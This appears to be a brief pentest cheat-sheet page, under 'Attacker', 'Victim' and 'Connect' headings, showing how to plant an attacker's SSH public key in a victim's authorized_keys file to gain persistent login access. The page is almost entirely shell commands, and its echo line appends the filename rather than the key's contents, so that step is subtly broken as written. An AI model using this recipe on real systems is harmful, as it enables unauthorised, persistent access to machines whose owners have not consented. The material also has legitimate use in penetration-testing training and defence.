# Attacker ssh-keygen -f <FILENAME> chmod 600 <FILENAME> cat <FILENAME>.pub -> copy # Victim echo <FILENAME>.pub >> <PATH>/.ssh/authorized_keys # Connect ssh -i <FILENAME> <USER>@<IP>
Last updated 1 year ago
Was this helpful?
This site uses cookies to deliver its service and to analyse traffic. By browsing this site, you accept the privacy policy.